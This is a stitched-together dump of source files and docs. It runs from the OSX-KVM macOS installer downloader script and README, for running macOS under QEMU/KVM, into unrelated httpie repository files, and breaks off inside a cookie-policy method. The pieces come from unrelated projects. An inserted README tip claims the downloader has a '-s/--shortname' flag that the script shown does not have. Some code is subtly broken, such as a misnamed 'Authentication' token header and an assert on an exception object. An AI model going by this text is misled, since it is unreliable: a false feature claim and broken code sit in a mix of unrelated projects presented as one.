# # Thanks to Tim Sutton for ideas, suggestions, and sample code. # # Updated in May of 2019 by Dhiru Kholia. '''installinstallmacos.py A tool to download the parts for an Install macOS app from Apple's softwareupdate servers and install a functioning Install macOS app onto an empty disk image''' # https://github.com/foxlet/macOS-Simple-KVM/blob/master/tools/FetchMacOS/fetch-macos.py # is pretty similar. # Bad hack import warnings warnings.filterwarnings("ignore", category=DeprecationWarning) import os import gzip import argparse import plistlib import subprocess from xml.dom import minidom from xml.parsers.expat import ExpatError import sys if sys.version_info[0] < 3: import urlparse as urlstuff else: import urllib.parse as urlstuff # Quick fix for python 3.9 and above if sys.version_info[0] == 3 and sys.version_info[1] >= 9: from types import MethodType def readPlist(self,filepath): with open(filepath, 'rb') as f: p = plistlib._PlistParser(dict) rootObject = p.parse(f) return rootObject # adding the method readPlist() to plistlib plistlib.readPlist = MethodType(readPlist, plistlib) # https://github.com/foxlet/macOS-Simple-KVM/blob/master/tools/FetchMacOS/fetch-macos.py (unused) # https://github.com/munki/macadmin-scripts catalogs = { "CustomerSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16customerseed-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "DeveloperSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16seed-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "PublicSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16beta-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "PublicRelease": "https://swscan.apple.com/content/catalogs/others/index-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "20": "https://swscan.apple.com/content/catalogs/others/index-11-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", '21': "https://swscan.apple.com/content/catalogs/others/index-12-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", '22': "https://swscan.apple.com/content/catalogs/others/index-13-12-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog" } def get_default_catalog(): '''Returns the default softwareupdate catalog for the current OS''' return catalogs["22"] # return catalogs["PublicRelease"] # return catalogs["DeveloperSeed"] class ReplicationError(Exception): '''A custom error when replication fails''' pass def cmd_exists(cmd): return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 def replicate_url(full_url, root_dir='/tmp', show_progress=False, ignore_cache=False, attempt_resume=False, installer=False, product_title=""): '''Downloads a URL and stores it in the same relative path on our filesystem. 
Returns a path to the replicated file.''' # hack print("[+] Fetching %s" % full_url) if installer and "BaseSystem.dmg" not in full_url and "Big Sur" not in product_title and "Monterey" not in product_title and "Ventura" not in product_title: return if ("Big Sur" in product_title or "Monterey" in product_title or "Ventura" in product_title) and "InstallAssistant.pkg" not in full_url: return attempt_resume = True # path = urllib.parse.urlsplit(full_url)[2] path = urlstuff.urlsplit(full_url)[2] relative_url = path.lstrip('/') relative_url = os.path.normpath(relative_url) # local_file_path = os.path.join(root_dir, relative_url) local_file_path = relative_url # print("Downloading %s..." % full_url) if cmd_exists('wget'): if not installer: download_cmd = ['wget', "-c", "--quiet", "-x", "-nH", full_url] # this doesn't work as there are multiple metadata files with the same name! # download_cmd = ['wget', "-c", "--quiet", full_url] else: download_cmd = ['wget', "-c", full_url] else: if not installer: download_cmd = ['curl', "--silent", "--show-error", "-o", local_file_path, "--create-dirs", full_url] else: local_file_path = os.path.basename(local_file_path) download_cmd = ['curl', "-o", local_file_path, full_url] try: subprocess.check_call(download_cmd) except subprocess.CalledProcessError as err: raise ReplicationError(err) return local_file_path def parse_server_metadata(filename): '''Parses a softwareupdate server metadata file, looking for information of interest. Returns a dictionary containing title, version, and description.''' title = '' vers = '' try: md_plist = plistlib.readPlist(filename) except (OSError, IOError, ExpatError) as err: print('Error reading %s: %s' % (filename, err), file=sys.stderr) return {} vers = md_plist.get('CFBundleShortVersionString', '') localization = md_plist.get('localization', {}) preferred_localization = (localization.get('English') or localization.get('en')) if preferred_localization: title = preferred_localization.get('title', '') metadata = {} metadata['title'] = title metadata['version'] = vers """ {'title': 'macOS Mojave', 'version': '10.14.5'} {'title': 'macOS Mojave', 'version': '10.14.6'} """ return metadata def get_server_metadata(catalog, product_key, workdir, ignore_cache=False): '''Replicate ServerMetaData''' try: url = catalog['Products'][product_key]['ServerMetadataURL'] try: smd_path = replicate_url( url, root_dir=workdir, ignore_cache=ignore_cache) return smd_path except ReplicationError as err: print('Could not replicate %s: %s' % (url, err), file=sys.stderr) return None except KeyError: # print('Malformed catalog.', file=sys.stderr) return None def parse_dist(filename): '''Parses a softwareupdate dist file, returning a dict of info of interest''' dist_info = {} try: dom = minidom.parse(filename) except ExpatError: print('Invalid XML in %s' % filename, file=sys.stderr) return dist_info except IOError as err: print('Error reading %s: %s' % (filename, err), file=sys.stderr) return dist_info titles = dom.getElementsByTagName('title') if titles: dist_info['title_from_dist'] = titles[0].firstChild.wholeText auxinfos = dom.getElementsByTagName('auxinfo') if not auxinfos: return dist_info auxinfo = auxinfos[0] key = None value = None children = auxinfo.childNodes # handle the possibility that keys from auxinfo may be nested # within a 'dict' element dict_nodes = [n for n in auxinfo.childNodes if n.nodeType == n.ELEMENT_NODE and n.tagName == 'dict'] if dict_nodes: children = dict_nodes[0].childNodes for node in children: if node.nodeType == 
node.ELEMENT_NODE and node.tagName == 'key': key = node.firstChild.wholeText if node.nodeType == node.ELEMENT_NODE and node.tagName == 'string': value = node.firstChild.wholeText if key and value: dist_info[key] = value key = None value = None return dist_info def download_and_parse_sucatalog(sucatalog, workdir, ignore_cache=False): '''Downloads and returns a parsed softwareupdate catalog''' try: localcatalogpath = replicate_url( sucatalog, root_dir=workdir, ignore_cache=ignore_cache) except ReplicationError as err: print('Could not replicate %s: %s' % (sucatalog, err), file=sys.stderr) exit(-1) if os.path.splitext(localcatalogpath)[1] == '.gz': with gzip.open(localcatalogpath) as the_file: content = the_file.read() try: catalog = plistlib.readPlistFromString(content) return catalog except ExpatError as err: print('Error reading %s: %s' % (localcatalogpath, err), file=sys.stderr) exit(-1) else: try: catalog = plistlib.readPlist(localcatalogpath) return catalog except (OSError, IOError, ExpatError) as err: print('Error reading %s: %s' % (localcatalogpath, err), file=sys.stderr) exit(-1) def find_mac_os_installers(catalog): '''Return a list of product identifiers for what appear to be macOS installers''' mac_os_installer_products = [] if 'Products' in catalog: for product_key in catalog['Products'].keys(): product = catalog['Products'][product_key] try: if product['ExtendedMetaInfo'][ 'InstallAssistantPackageIdentifiers']: mac_os_installer_products.append(product_key) except KeyError: continue return mac_os_installer_products def os_installer_product_info(catalog, workdir, ignore_cache=False): '''Returns a dict of info about products that look like macOS installers''' product_info = {} installer_products = find_mac_os_installers(catalog) for product_key in installer_products: product_info[product_key] = {} filename = get_server_metadata(catalog, product_key, workdir) if filename: product_info[product_key] = parse_server_metadata(filename) else: # print('No server metadata for %s' % product_key) product_info[product_key]['title'] = None product_info[product_key]['version'] = None product = catalog['Products'][product_key] product_info[product_key]['PostDate'] = product['PostDate'] distributions = product['Distributions'] dist_url = distributions.get('English') or distributions.get('en') try: dist_path = replicate_url( dist_url, root_dir=workdir, ignore_cache=ignore_cache) except ReplicationError as err: print('Could not replicate %s: %s' % (dist_url, err), file=sys.stderr) else: dist_info = parse_dist(dist_path) product_info[product_key]['DistributionPath'] = dist_path product_info[product_key].update(dist_info) if not product_info[product_key]['title']: product_info[product_key]['title'] = dist_info.get('title_from_dist') if not product_info[product_key]['version']: product_info[product_key]['version'] = dist_info.get('VERSION') return product_info def replicate_product(catalog, product_id, workdir, ignore_cache=False, product_title=""): '''Downloads all the packages for a product''' product = catalog['Products'][product_id] for package in product.get('Packages', []): # TO-DO: Check 'Size' attribute and make sure # we have enough space on the target # filesystem before attempting to download if 'URL' in package: try: replicate_url( package['URL'], root_dir=workdir, show_progress=True, ignore_cache=ignore_cache, attempt_resume=(not ignore_cache), installer=True, product_title=product_title) except ReplicationError as err: print('Could not replicate %s: %s' % (package['URL'], err), 
file=sys.stderr) exit(-1) if 'MetadataURL' in package: try: replicate_url(package['MetadataURL'], root_dir=workdir, ignore_cache=ignore_cache, installer=True) except ReplicationError as err: print('Could not replicate %s: %s' % (package['MetadataURL'], err), file=sys.stderr) exit(-1) def find_installer_app(mountpoint): '''Returns the path to the Install macOS app on the mountpoint''' applications_dir = os.path.join(mountpoint, 'Applications') for item in os.listdir(applications_dir): if item.endswith('.app'): return os.path.join(applications_dir, item) return None def determine_version(version, title, product_info): if version: if version == 'latest': from distutils.version import StrictVersion latest_version = StrictVersion('0.0.0') for index, product_id in enumerate(product_info): if not title or product_info[product_id]['title'] == title: d = product_info[product_id]['version'] if d > latest_version: latest_version = d if latest_version == StrictVersion("0.0.0"): print("Could not find latest version {}") exit(1) version = str(latest_version) for index, product_id in enumerate(product_info): v = product_info[product_id]['version'] if v == version: return product_id, product_info[product_id]['title'] print("Could not find version {}. Versions available are:".format(version)) for _, pid in enumerate(product_info): print("- {}".format(product_info[pid]['version'])) exit(1) # display a menu of choices (some seed catalogs have multiple installers) print('%2s %12s %10s %11s %s' % ('#', 'ProductID', 'Version', 'Post Date', 'Title')) for index, product_id in enumerate(product_info): print('%2s %12s %10s %11s %s' % ( index + 1, product_id, product_info[product_id]['version'], product_info[product_id]['PostDate'].strftime('%Y-%m-%d'), product_info[product_id]['title'] )) answer = input( '\nChoose a product to download (1-%s): ' % len(product_info)) try: index = int(answer) - 1 if index < 0: raise ValueError product_id = list(product_info.keys())[index] return product_id, product_info[product_id]['title'] except (ValueError, IndexError): pass print('Invalid input provided.') exit(0) def main(): '''Do the main thing here''' """ if os.getuid() != 0: sys.exit('This command requires root (to install packages), so please ' 'run again with sudo or as root.') """ parser = argparse.ArgumentParser() parser.add_argument('--workdir', metavar='path_to_working_dir', default='.', help='Path to working directory on a volume with over ' '10G of available space. Defaults to current working ' 'directory.') parser.add_argument('--version', metavar='version', default=None, help='The version to download in the format of ' '"$major.$minor.$patch", e.g. "10.15.4". Can ' 'be "latest" to download the latest version.') parser.add_argument('--title', metavar='title', default=None, help='When using "--version latest", you can use ' 'this to filter the search to only products with ' 'this title') parser.add_argument('--compress', action='store_true', help='Output a read-only compressed disk image with ' 'the Install macOS app at the root. This is now the ' 'default. Use --raw to get a read-write sparse image ' 'with the app in the Applications directory.') parser.add_argument('--raw', action='store_true', help='Output a read-write sparse image ' 'with the app in the Applications directory. 
Requires ' 'less available disk space and is faster.') parser.add_argument('--ignore-cache', action='store_true', help='Ignore any previously cached files.') args = parser.parse_args() su_catalog_url = get_default_catalog() if not su_catalog_url: print('Could not find a default catalog url for this OS version.', file=sys.stderr) exit(-1) # download sucatalog and look for products that are for macOS installers catalog = download_and_parse_sucatalog( su_catalog_url, args.workdir, ignore_cache=args.ignore_cache) product_info = os_installer_product_info( catalog, args.workdir, ignore_cache=args.ignore_cache) if not product_info: print('No macOS installer products found in the sucatalog.', file=sys.stderr) exit(-1) product_id, product_title = determine_version(args.version, args.title, product_info) print(product_id, product_title) # download all the packages for the selected product replicate_product(catalog, product_id, args.workdir, ignore_cache=args.ignore_cache, product_title=product_title) if __name__ == '__main__': main()
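The backup downloader above shims the removed `plistlib.readPlist` API back in for Python 3.9+. For reference, a minimal sketch of the modern equivalent (the file name below is hypothetical; any plist fetched by `replicate_url()` would be read the same way):

```python
import plistlib


def read_plist(filepath):
    """Modern replacement for plistlib.readPlist (removed in Python 3.9):
    open the file in binary mode and let plistlib.load() parse it."""
    with open(filepath, 'rb') as f:
        return plistlib.load(f)


if __name__ == '__main__':
    # Hypothetical file name, used purely for illustration.
    metadata = read_plist('ServerMetadata.plist')
    print(metadata.get('CFBundleShortVersionString', ''))
```

(`plistlib.loads()` plays the same role for in-memory bytes, replacing the old `readPlistFromString`.)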
### Note This `README.md` documents the process of creating a `Virtual Hackintosh` system. Note: All blobs and resources included in this repository are re-derivable (all instructions are included!). :green_heart: Looking for **commercial** support with this stuff? I am [available over email](mailto:[email protected]?subject=[GitHub]%20OSX-KVM%20Commercial%20Support%20Request&body=Hi%20-%20We%20are%20interested%20in%20purchasing%20commercial%20support%20options%20for%20your%20project.) for a chat for **commercial support options only**. Note: Project sponsors get access to the `Private OSX-KVM` repository, and direct support. Struggling with `Content Caching` stuff? We can help. Working with `Proxmox` and macOS? See [Nick's blog for sure](https://www.nicksherlock.com/). Yes, we support offline macOS installations now - see [this document](./run_offline.md) 🎉 ### Contributing Back This project can always use your help, time and attention. I am looking for help (pull-requests!) with the following work items: * Documentation around running macOS on popular cloud providers (Hetzner, GCP, AWS). See the `Is This Legal?` section and associated references. * Document (share) how you use this project to build + test open-source projects / get your stuff done. * Document how to use this project for XNU kernel debugging and development. * Document the process to launch a bunch of headless macOS VMs (build farm). * Document usage of [munki](https://github.com/munki/munki) to deploy software to such a `build farm`. * Enable VNC + SSH support out of the box or more easily. * Robustness improvements are always welcome! * (Not so) crazy idea - automate the macOS installation via OpenCV. ### Requirements * A modern Linux distribution. E.g. Ubuntu 24.04 LTS 64-bit or later. * QEMU >= 8.2.2 * A CPU with Intel VT-x / AMD SVM support is required (`grep -e vmx -e svm /proc/cpuinfo`) * A CPU with SSE4.1 support is required for >= macOS Sierra * A CPU with AVX2 support is required for >= macOS Ventura Note: Older AMD CPU(s) are known to be problematic but modern AMD Ryzen processors work just fine (even for macOS Sonoma). ### Installation Preparation * Install QEMU and other packages. ``` sudo apt-get install qemu-system uml-utilities virt-manager git \ wget libguestfs-tools p7zip-full make dmg2img tesseract-ocr \ tesseract-ocr-eng genisoimage vim net-tools screen -y ``` This step may need to be adapted for your Linux distribution. * Clone this repository on your QEMU system. Files from this repository are used in the following steps. ``` cd ~ git clone --depth 1 --recursive https://github.com/kholia/OSX-KVM.git cd OSX-KVM ``` Repository updates can be pulled via the following command: ``` git pull --rebase ``` This repository uses rebase based workflows heavily. * KVM may need the following tweak on the host machine to work. ``` sudo modprobe kvm; echo 1 | sudo tee /sys/module/kvm/parameters/ignore_msrs ``` To make this change permanent, you may use the following command. ``` sudo cp kvm.conf /etc/modprobe.d/kvm.conf # for intel boxes only sudo cp kvm_amd.conf /etc/modprobe.d/kvm.conf # for amd boxes only ``` * Add user to the `kvm` and `libvirt` groups (might be needed). ``` sudo usermod -aG kvm $(whoami) sudo usermod -aG libvirt $(whoami) sudo usermod -aG input $(whoami) ``` Note: Re-login after executing this command. * Fetch macOS installer. ``` ./fetch-macOS-v2.py ``` You can choose your desired macOS version here. After executing this step, you should have the `BaseSystem.dmg` file in the current folder. 
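Tip: the recovery downloader script shown earlier in this repository also exposes a `-s` / `--shortname` flag (e.g. `-s ventura`) that skips the interactive product menu entirely; the available short names are listed in its argparse options.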
ATTENTION: Let `>= Big Sur` setup sit at the `Country Selection` screen, and other similar places for a while if things are being slow. The initial macOS setup wizard will eventually succeed. Sample run: ``` $ ./fetch-macOS-v2.py 1. High Sierra (10.13) 2. Mojave (10.14) 3. Catalina (10.15) 4. Big Sur (11.7) 5. Monterey (12.6) 6. Ventura (13) - RECOMMENDED 7. Sonoma (14) Choose a product to download (1-7): 6 ``` Note: Modern NVIDIA GPUs are supported on HighSierra but not on later versions of macOS. * Convert the downloaded `BaseSystem.dmg` file into the `BaseSystem.img` file. ``` dmg2img -i BaseSystem.dmg BaseSystem.img ``` * Create a virtual HDD image where macOS will be installed. If you change the name of the disk image from `mac_hdd_ng.img` to something else, the boot scripts will need to be updated to point to the new image name. ``` qemu-img create -f qcow2 mac_hdd_ng.img 256G ``` NOTE: Create this HDD image file on a fast SSD/NVMe disk for best results. * Now you are ready to install macOS 🚀 ### Installation - CLI method (primary). Just run the `OpenCore-Boot.sh` script to start the installation process. ``` ./OpenCore-Boot.sh ``` Note: This same script works for all recent macOS versions. - Use the `Disk Utility` tool within the macOS installer to partition, and format the virtual disk attached to the macOS VM. Use `APFS` (the default) for modern macOS versions. - Go ahead, and install macOS 🙌 - (OPTIONAL) Use this macOS VM disk with libvirt (virt-manager / virsh stuff). - Edit `macOS-libvirt-Catalina.xml` file and change the various file paths (search for `CHANGEME` strings in that file). The following command should do the trick usually. ``` sed "s/CHANGEME/$USER/g" macOS-libvirt-Catalina.xml > macOS.xml virt-xml-validate macOS.xml ``` - Create a VM by running the following command. ```bash virsh --connect qemu:///system define macOS.xml ``` - If needed, grant necessary permissions to libvirt-qemu user, ``` sudo setfacl -m u:libvirt-qemu:rx /home/$USER sudo setfacl -R -m u:libvirt-qemu:rx /home/$USER/OSX-KVM ``` - Launch `virt-manager` and start the `macOS` virtual machine. ### Headless macOS - Use the provided [boot-macOS-headless.sh](./boot-macOS-headless.sh) script. ``` ./boot-macOS-headless.sh ``` ### Setting Expectations Right Nice job on setting up a `Virtual Hackintosh` system! Such a system can be used for a variety of purposes (e.g. software builds, testing, reversing work), and it may be all you need, along with some tweaks documented in this repository. However, such a system lacks graphical acceleration, a reliable sound sub-system, USB 3 functionality and other similar things. To enable these things, take a look at our [notes](notes.md). We would like to resume our testing and documentation work around this area. Please [reach out to us](mailto:[email protected]?subject=[GitHub]%20OSX-KVM%20Funding%20Support) if you are able to fund this area of work. It is possible to have 'beyond-native-apple-hw' performance but it does require work, patience, and a bit of luck (perhaps?). ### Post-Installation * See [networking notes](networking-qemu-kvm-howto.txt) on how to setup networking in your VM, outbound and also inbound for remote access to your VM via SSH, VNC, etc. * To passthrough GPUs and other devices, see [these notes](notes.md#gpu-passthrough-notes). * Need a different resolution? Check out the [notes](notes.md#change-resolution-in-opencore) included in this repository. * Trouble with iMessage? 
Check out the [notes](notes.md#trouble-with-imessage) included in this repository. * Highly recommended macOS tweaks - https://github.com/sickcodes/osx-optimizer ### Is This Legal? The "secret" Apple OSK string is widely available on the Internet. It is also included in a public court document [available here](http://www.rcfp.org/sites/default/files/docs/20120105_202426_apple_sealing.pdf). I am not a lawyer but it seems that Apple's attempt(s) to get the OSK string treated as a trade secret did not work out. Due to these reasons, the OSK string is freely included in this repository. Please review the ['Legality of Hackintoshing' documentation bits from Dortania's OpenCore Install Guide](https://dortania.github.io/OpenCore-Install-Guide/why-oc.html#legality-of-hackintoshing). Gabriel Somlo also has [some thoughts](http://www.contrib.andrew.cmu.edu/~somlo/OSXKVM/) on the legal aspects involved in running macOS under QEMU/KVM. You may also find [this 'Announcing Amazon EC2 Mac instances for macOS' article](https://aws.amazon.com/about-aws/whats-new/2020/11/announcing-amazon-ec2-mac-instances-for-macos/ ) interesting. Note: It is your responsibility to understand, and accept (or not accept) the Apple EULA. Note: This is not legal advice, so please make the proper assessments yourself and discuss with your lawyers if you have any concerns (Text credit: Dortania) ### Motivation My aim is to enable macOS based educational tasks, builds + testing, kernel debugging, reversing, and macOS security research in an easy, reproducible manner without getting 'invested' in Apple's closed ecosystem (too heavily). These `Virtual Hackintosh` systems are not intended to replace the genuine physical macOS systems. Personally speaking, this repository has been a way for me to 'exit' the Apple ecosystem. It has helped me to test and compare the interoperability of `Canon CanoScan LiDE 120` scanner, and `Brother HL-2250DN` laser printer. And these devices now work decently enough on modern versions of Ubuntu (Yay for free software). Also, a long time back, I had to completely wipe my (then) brand new `MacBook Pro (Retina, 15-inch, Late 2013)` and install Xubuntu on it - as the `OS X` kernel kept crashing on it! Backstory: I was a (poor) student in Canada in a previous life and Apple made [my work on cracking Apple Keychains](https://github.com/openwall/john/blob/bleeding-jumbo/src/keychain_fmt_plug.c) a lot harder than it needed to be. This is how I got interested in Hackintosh systems.
cli
f4cf43ecdd6c5c52b5c4ba91086d5c6ccfebcd6d
File: setup.py from setuptools import setup setup() File: docs/installation/generate.py import re import sys from pathlib import Path from typing import Dict import yaml from jinja2 import Template Database = Dict[str, dict] # Files HERE = Path(__file__).parent DB_FILE = HERE / 'methods.yml' DOC_FILE = HERE.parent / 'README.md' TPL_FILE = HERE / 'installation.jinja2' # Database keys KEY_DOC_STRUCTURE = 'docs-structure' KEY_TOOLS = 'tools' # Markers in-between content will be put. MARKER_START = '<div data-installation-instructions>' MARKER_END = '</div>' def generate_documentation() -> str: database = load_database() structure = build_docs_structure(database) template = Template(source=TPL_FILE.read_text(encoding='utf-8')) output = template.render(structure=structure) output = clean_template_output(output) return output def save_doc_file(content: str) -> None: current_doc = load_doc_file() marker_start = current_doc.find(MARKER_START) + len(MARKER_START) assert marker_start > 0, 'cannot find the start marker' marker_end = current_doc.find(MARKER_END, marker_start) assert marker_start < marker_end, f'{marker_end=} < {marker_start=}' updated_doc = ( current_doc[:marker_start] + '\n\n' + content + '\n\n' + current_doc[marker_end:] ) if current_doc != updated_doc: DOC_FILE.write_text(updated_doc, encoding='utf-8') def build_docs_structure(database: Database): tools = database[KEY_TOOLS] assert len(tools) == len({tool['title'] for tool in tools.values()}), 'tool titles need to be unique' tree = database[KEY_DOC_STRUCTURE] structure = [] for platform, tools_ids in tree.items(): assert platform.isalnum(), f'{platform=} must be alphanumeric for generated links to work' platform_tools = [tools[tool_id] for tool_id in tools_ids] structure.append((platform, platform_tools)) return structure def clean_template_output(output): output = '\n'.join(line.strip() for line in output.strip().splitlines()) output = re.sub('\n{3,}', '\n\n', output) return output def load_database() -> Database: return yaml.safe_load(DB_FILE.read_text(encoding='utf-8')) def load_doc_file() -> str: return DOC_FILE.read_text(encoding='utf-8') def main() -> int: content = generate_documentation() save_doc_file(content) return 0 if __name__ == '__main__': sys.exit(main()) File: docs/contributors/fetch.py """ Generate the contributors database. FIXME: replace `requests` calls with the HTTPie API, when available. 
""" import json import os import re import sys from copy import deepcopy from datetime import datetime from pathlib import Path from subprocess import check_output from time import sleep from typing import Any, Dict, Optional, Set import requests FullNames = Set[str] GitHubLogins = Set[str] Person = Dict[str, str] People = Dict[str, Person] UserInfo = Dict[str, Any] CO_AUTHORS = re.compile(r'Co-authored-by: ([^<]+) <').finditer API_URL = 'https://api.github.com' REPO = OWNER = 'httpie' REPO_URL = f'{API_URL}/repos/{REPO}/{OWNER}' HERE = Path(__file__).parent DB_FILE = HERE / 'people.json' DEFAULT_PERSON: Person = {'committed': [], 'reported': [], 'github': '', 'twitter': ''} SKIPPED_LABELS = {'invalid'} GITHUB_TOKEN = os.getenv('GITHUB_TOKEN') assert GITHUB_TOKEN, 'GITHUB_TOKEN envar is missing' class FinishedForNow(Exception): """Raised when remaining GitHub rate limit is zero.""" def main(previous_release: str, current_release: str) -> int: since = release_date(previous_release) until = release_date(current_release) contributors = load_awesome_people() try: committers = find_committers(since, until) reporters = find_reporters(since, until) except Exception as exc: # We want to save what we fetched so far. So pass. print(' !! ', exc) try: merge_all_the_people(current_release, contributors, committers, reporters) fetch_missing_users_details(contributors) except FinishedForNow: # We want to save what we fetched so far. So pass. print(' !! Committers:', committers) print(' !! Reporters:', reporters) exit_status = 1 else: exit_status = 0 save_awesome_people(contributors) return exit_status def find_committers(since: str, until: str) -> FullNames: url = f'{REPO_URL}/commits' page = 1 per_page = 100 params = { 'since': since, 'until': until, 'per_page': per_page, } committers: FullNames = set() while 'there are commits': params['page'] = page data = fetch(url, params=params) for item in data: commit = item['commit'] committers.add(commit['author']['name']) debug(' >>> Commit', item['html_url']) for co_author in CO_AUTHORS(commit['message']): name = co_author.group(1) committers.add(name) if len(data) < per_page: break page += 1 return committers def find_reporters(since: str, until: str) -> GitHubLogins: url = f'{API_URL}/search/issues' page = 1 per_page = 100 params = { 'q': f'repo:{REPO}/{OWNER} is:issue closed:{since}..{until}', 'per_page': per_page, } reporters: GitHubLogins = set() while 'there are issues': params['page'] = page data = fetch(url, params=params) for item in data['items']: # Filter out unwanted labels. 
if any(label['name'] in SKIPPED_LABELS for label in item['labels']): continue debug(' >>> Issue', item['html_url']) reporters.add(item['user']['login']) if len(data['items']) < per_page: break page += 1 return reporters def merge_all_the_people(release: str, contributors: People, committers: FullNames, reporters: GitHubLogins) -> None: """ >>> contributors = {'Alice': new_person(github='alice', twitter='alice')} >>> merge_all_the_people('2.6.0', contributors, {}, {}) >>> contributors {'Alice': {'committed': [], 'reported': [], 'github': 'alice', 'twitter': 'alice'}} >>> contributors = {'Bob': new_person(github='bob', twitter='bob')} >>> merge_all_the_people('2.6.0', contributors, {'Bob'}, {'bob'}) >>> contributors {'Bob': {'committed': ['2.6.0'], 'reported': ['2.6.0'], 'github': 'bob', 'twitter': 'bob'}} >>> contributors = {'Charlotte': new_person(github='charlotte', twitter='charlotte', committed=['2.5.0'], reported=['2.5.0'])} >>> merge_all_the_people('2.6.0', contributors, {'Charlotte'}, {'charlotte'}) >>> contributors {'Charlotte': {'committed': ['2.5.0', '2.6.0'], 'reported': ['2.5.0', '2.6.0'], 'github': 'charlotte', 'twitter': 'charlotte'}} """ # Update known contributors. for name, details in contributors.items(): if name in committers: if release not in details['committed']: details['committed'].append(release) committers.remove(name) if details['github'] in reporters: if release not in details['reported']: details['reported'].append(release) reporters.remove(details['github']) # Add new committers. for name in committers: user_info = user(fullname=name) contributors[name] = new_person( github=user_info['login'], twitter=user_info['twitter_username'], committed=[release], ) if user_info['login'] in reporters: contributors[name]['reported'].append(release) reporters.remove(user_info['login']) # Add new reporters. for github_username in reporters: user_info = user(github_username=github_username) contributors[user_info['name'] or user_info['login']] = new_person( github=github_username, twitter=user_info['twitter_username'], reported=[release], ) def release_date(release: str) -> str: date = check_output(['git', 'log', '-1', '--format=%ai', release], text=True).strip() return datetime.strptime(date, '%Y-%m-%d %H:%M:%S %z').isoformat() def load_awesome_people() -> People: try: with DB_FILE.open(encoding='utf-8') as fh: return json.load(fh) except (FileNotFoundError, ValueError): return {} def fetch(url: str, params: Optional[Dict[str, str]] = None) -> UserInfo: headers = { 'Accept': 'application/vnd.github.v3+json', 'Authentication': f'token {GITHUB_TOKEN}' } for retry in range(1, 6): debug(f'[{retry}/5]', f'{url = }', f'{params = }') with requests.get(url, params=params, headers=headers) as req: try: req.raise_for_status() except requests.exceptions.HTTPError as exc: if exc.response.status_code == 403: # 403 Client Error: rate limit exceeded for url: ... 
now = int(datetime.utcnow().timestamp()) xrate_limit_reset = int(exc.response.headers['X-RateLimit-Reset']) wait = xrate_limit_reset - now if wait > 20: raise FinishedForNow() debug(' !', 'Waiting', wait, 'seconds before another try ...') sleep(wait) continue return req.json() assert ValueError('Rate limit exceeded') def new_person(**kwargs: str) -> Person: data = deepcopy(DEFAULT_PERSON) data.update(**kwargs) return data def user(fullname: Optional[str] = '', github_username: Optional[str] = '') -> UserInfo: if github_username: url = f'{API_URL}/users/{github_username}' return fetch(url) url = f'{API_URL}/search/users' for query in (f'fullname:{fullname}', f'user:{fullname}'): params = { 'q': f'repo:{REPO}/{OWNER} {query}', 'per_page': 1, } user_info = fetch(url, params=params) if user_info['items']: user_url = user_info['items'][0]['url'] return fetch(user_url) def fetch_missing_users_details(people: People) -> None: for name, details in people.items(): if details['github'] and details['twitter']: continue user_info = user(github_username=details['github'], fullname=name) if not details['github']: details['github'] = user_info['login'] if not details['twitter']: details['twitter'] = user_info['twitter_username'] def save_awesome_people(people: People) -> None: with DB_FILE.open(mode='w', encoding='utf-8') as fh: json.dump(people, fh, indent=4, sort_keys=True) fh.write("\n") def debug(*args: Any) -> None: if os.getenv('DEBUG') == '1': print(*args) if __name__ == '__main__': ret = 1 try: ret = main(*sys.argv[1:]) except TypeError: ret = 2 print(f''' Fetch contributors to a release. Usage: python {sys.argv[0]} {sys.argv[0]} <RELEASE N-1> <RELEASE N> Example: python {sys.argv[0]} 2.4.0 2.5.0 Define the DEBUG=1 environment variable to enable verbose output. ''') except KeyboardInterrupt: ret = 255 sys.exit(ret) File: docs/contributors/generate.py """ Generate snippets to copy-paste. """ import sys from jinja2 import Template from fetch import HERE, load_awesome_people TPL_FILE = HERE / 'snippet.jinja2' HTTPIE_TEAM = { 'claudiatd', 'jakubroztocil', 'jkbr', 'isidentical' } BOT_ACCOUNTS = { 'dependabot-sr' } IGNORE_ACCOUNTS = HTTPIE_TEAM | BOT_ACCOUNTS def generate_snippets(release: str) -> str: people = load_awesome_people() contributors = { name: details for name, details in people.items() if details['github'] not in IGNORE_ACCOUNTS and (release in details['committed'] or release in details['reported']) } template = Template(source=TPL_FILE.read_text(encoding='utf-8')) output = template.render(contributors=contributors, release=release) print(output) return 0 if __name__ == '__main__': ret = 1 try: ret = generate_snippets(sys.argv[1]) except (IndexError, TypeError): ret = 2 print(f''' Generate snippets for contributors to a release. Usage: python {sys.argv[0]} {sys.argv[0]} <RELEASE> ''') sys.exit(ret) File: httpie/cookies.py from http import cookiejar _LOCALHOST = 'localhost' _LOCALHOST_SUFFIX = '.localhost' class HTTPieCookiePolicy(cookiejar.DefaultCookiePolicy): def return_ok_secure(self, cookie, request): """Check whether the given cookie is sent to a secure host.""" is_secure_protocol = super().return_ok_secure(cookie, request) if is_secure_protocol: return True # The original implementation of this method only takes secure protocols # (e.g., https) into account, but the latest developments in modern browsers # (chrome, firefox) assume 'localhost' is also a secure location. So we # override it with our own strategy. 
